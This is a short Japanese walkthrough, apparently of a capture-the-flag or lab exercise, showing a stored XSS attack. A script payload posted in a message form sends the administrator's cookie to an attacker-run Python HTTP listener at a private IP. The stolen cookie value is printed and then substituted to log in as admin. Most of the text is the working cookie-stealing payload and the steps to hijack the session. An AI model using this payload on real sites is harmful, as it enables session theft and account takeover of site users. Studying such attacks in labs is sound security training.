Xss コンテンツの主な焦点は、管理者のクッキーを取得し、その後、偽の管理者のクッキーを使用してログインすることです。
以下はインターフェースです
上記の画像の Test をクリックしてメッセージを残すことができます
クッキーを取得するための XSS ペイロードを準備します
<script>
document.write('<img src="http://10.1.12.135:8889?'+ escape(document.cookie) + '">')
</script>
Web サーバーを起動し、クッキーを受け取ります
Python -m SimpleHTTPServer 8889
ペイロードを入力ボックスに書き込みます
クエリを送信するために送信ボタンをクリックします
待つ
Python がクッキーを受け取ったかどうかを確認します
クッキーをコピーします
1acb0fb952b3caaf1ab7277511923138
クッキーの値を置き換えます
置換するために Edit をクリックします
ページをリフレッシュし、Admin をクリックします
ログインに成功し、キーを取得します